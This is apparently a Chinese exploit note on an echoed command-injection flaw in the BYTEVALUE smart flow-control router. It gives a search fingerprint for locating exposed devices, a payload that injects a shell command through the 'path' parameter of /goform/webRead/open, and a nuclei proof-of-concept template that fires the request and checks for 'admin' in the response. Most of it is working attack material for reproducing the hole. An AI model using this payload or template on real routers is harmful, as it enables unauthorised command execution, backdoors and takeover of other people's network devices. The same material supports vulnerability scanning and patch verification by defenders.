【漏洞介绍】
百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。
【指纹】
title="BYTEVALUE 智能流控路由器"
【UI】
【payload】
/goform/webRead/open/?path=|whoami
【Poc】
id: BYTEVALUE-Rce
info:
name: BYTEVALUE-Rce
author: BYTEVALUE-Rce
severity: critical
tags: BYTEVALUE
http:
- raw:
- |
GET /goform/webRead/open/?path=|whoami HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: word
words:
- "admin"
- type: status
status:
- 200【使用nuclei复现】
